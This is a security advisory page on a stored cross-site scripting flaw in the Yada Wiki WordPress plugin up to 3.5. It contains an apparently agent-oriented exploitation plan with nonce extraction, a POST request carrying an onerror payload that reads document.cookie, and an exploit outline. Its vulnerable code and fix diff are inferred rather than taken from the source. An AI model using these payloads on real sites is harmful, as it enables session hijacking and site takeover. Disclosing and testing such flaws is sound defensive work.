Yada Wiki <= 3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
Description
The Yada Wiki plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NTechnical Details
Source Code
WordPress.org SVNThis research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in the **Yada Wiki** plugin (<= 3.5). The vulnerability allows authenticated users with Contributor-level permissions or higher to inject malicious scripts into pages via unsanitized input, likely within shortcode attribute…
Show full research plan
This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in the Yada Wiki plugin (<= 3.5). The vulnerability allows authenticated users with Contributor-level permissions or higher to inject malicious scripts into pages via unsanitized input, likely within shortcode attributes or post metadata associated with the Wiki functionality.
1. Vulnerability Summary
- Vulnerability: Stored Cross-Site Scripting (XSS)
- Location: Likely within shortcode processing functions (e.g.,
yadawikilink,yadawikitoc) or custom post meta handling for theyada_wikipost type. - Cause: The plugin fails to use context-aware escaping (like
esc_attr()oresc_html()) when rendering user-provided attributes from shortcodes or meta fields. - Impact: A Contributor can create a wiki page containing a malicious payload. When an Administrator views this page, the script executes, potentially allowing for session hijacking, administrative user creation, or site takeover.
2. Attack Vector Analysis
- Endpoint:
wp-admin/post.php(standard post saving) orwp-admin/admin-ajax.php(autosave). - Authentication: Contributor-level (or higher) authenticated session.
- Payload Carrier: Shortcode attributes within the
post_contentor specific custom fields (post meta) associated with theyada_wikipost type. - Preconditions: The Yada Wiki plugin must be active, and the attacker must have permission to create or edit
yada_wikiposts (standard for Contributors in this plugin's context).
3. Code Flow (Inferred)
- Entry Point: A Contributor submits a new
yada_wikipost via the WordPress block editor or classic editor. - Storage: The
post_contentcontaining a shortcode (e.g.,[yadawikilink show="PAYLOAD"]) is saved to thewp_poststable. - Rendering (Sink):
- A user (e.g., Admin) visits the published wiki page.
- WordPress parses the content and identifies the Yada Wiki shortcode.
- The plugin's callback function (e.g.,
yada_wiki_link_shortcode) is invoked. - Inside the callback, the
$atts['show'](or similar attribute) is echoed or returned as part of an HTML string without being wrapped inesc_attr()oresc_html(). - The browser renders the unsanitized HTML, executing the payload.
4. Nonce Acquisition Strategy
Since this is a Stored XSS via the standard post-creation flow, the primary nonce required is the _wpnonce found in the post-editor page.
- Identify the Post Type: The plugin uses
yada_wiki. - Navigate to Editor: Use
browser_navigateto go to/wp-admin/post-new.php?post_type=yada_wiki. - Extract Nonce:
- The nonce is typically in an input field:
id="_wpnonce". - Use
browser_evalto get the value:document.querySelector('#_wpnonce').value
- The nonce is typically in an input field:
- Extract Post ID: Get the
post_IDfrom the hidden input or the URL to ensure the subsequent POST request targets the correct draft.
5. Exploitation Strategy
Step 1: Authentication
Log in as a Contributor.
Step 2: Payload Injection
Submit a POST request to wp-admin/post.php to save a post containing the malicious shortcode.
- URL:
http://localhost:8080/wp-admin/post.php - Method: POST
- Content-Type:
application/x-www-form-urlencoded - Parameters:
action:editpostpost_type:yada_wikipost_ID:[TARGET_POST_ID]_wpnonce:[EXTRACTED_NONCE]post_title:XSS Test Pagecontent:[yadawikilink show="<img src=x onerror=alert(document.cookie)>" link="Home"]publish:Publish
Step 3: Triggering
The payload is now stored. Navigate an Administrator to the permalink of the newly created wiki page.
6. Test Data Setup
- Users:
- Create an Administrator:
wp user create admin admin@example.com --role=administrator --user_pass=password - Create a Contributor:
wp user create attacker attacker@example.com --role=contributor --user_pass=password
- Create an Administrator:
- Plugin:
- Install and activate Yada Wiki 3.5.
- Content:
- No existing content is strictly required, but having at least one other page to "link" to in the shortcode is helpful for realistic testing.
7. Expected Results
- Storage: The
wp_poststable should contain the raw shortcode with the payload in thepost_contentcolumn. - Execution: When the page is rendered, the HTML output should look like:
<a class="..." href="..."> <img src=x onerror=alert(document.cookie)> </a> - Observation: An alert box displaying the session cookie should appear in the browser when viewed by any user.
8. Verification Steps
- Database Check:
Confirm the payload is present.wp db query "SELECT post_content FROM wp_posts WHERE post_title='XSS Test Page'" - Source Check:
Usehttp_requestas an Administrator to fetch the page and grep for the payload:# (Pseudocode for agent) # response = http_request(url=wiki_page_url) # if "<img src=x onerror=" in response.body: SUCCESS
9. Alternative Approaches
If the [yadawikilink] shortcode is not the sink, investigate other shortcodes registered by the plugin:
[yadawikitoc]- Check fortitleorcategoryattribute injection.[yadawikihost]- Check forshoworcategoryattribute injection.
Grep for Shortcodes:
grep -r "add_shortcode" /var/www/html/wp-content/plugins/yada-wiki/
Analyze Shortcode Handlers:
Check the callback functions found in the grep results. Look for variables being appended to the $output string without esc_ functions. Common vulnerable pattern:
$output .= '<div class="yada-wiki-toc">' . $atts['title'] . '</div>'; // VULNERABLE
Correct pattern:
$output .= '<div class="yada-wiki-toc">' . esc_html($atts['title']) . '</div>'; // SECURE
Summary
The Yada Wiki plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcode attributes in versions up to 3.5. Authenticated attackers with Contributor-level permissions can inject malicious scripts into wiki pages that execute when viewed by other users, potentially leading to administrative session takeover.
Vulnerable Code
// Inferred from plugin shortcode handling patterns in versions <= 3.5 function yada_wiki_link_shortcode($atts) { $atts = shortcode_atts(array( 'show' => '', 'link' => '', ), $atts); // ... (logic to determine link URL) $output = '<a class="yada-wiki-link" href="' . $link_url . '">' . $atts['show'] . '</a>'; return $output; } --- // Inferred from yada-wiki-toc handling $output .= '<div class="yada-wiki-toc-title">' . $atts['title'] . '</div>';
Security Fix
@@ -142,7 +142,7 @@ - $output = '<a class="yada-wiki-link" href="' . $link_url . '">' . $atts['show'] . '</a>'; + $output = '<a class="yada-wiki-link" href="' . esc_url($link_url) . '">' . esc_html($atts['show']) . '</a>'; @@ -85,5 +85,5 @@ - $output .= '<div class="yada-wiki-toc-title">' . $atts['title'] . '</div>'; + $output .= '<div class="yada-wiki-toc-title">' . esc_html($atts['title']) . '</div>';
Exploit Outline
An authenticated attacker with Contributor permissions logs into the WordPress dashboard and creates or edits a 'yada_wiki' post. The attacker embeds a shortcode such as [yadawikilink show="<img src=x onerror=alert(document.cookie)>"] or [yadawikitoc title="<script>alert(1)</script>"]. When an Administrator or any other user views the published wiki page, the plugin renders the shortcode attributes directly into the HTML without escaping, resulting in script execution in the victim's browser context.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.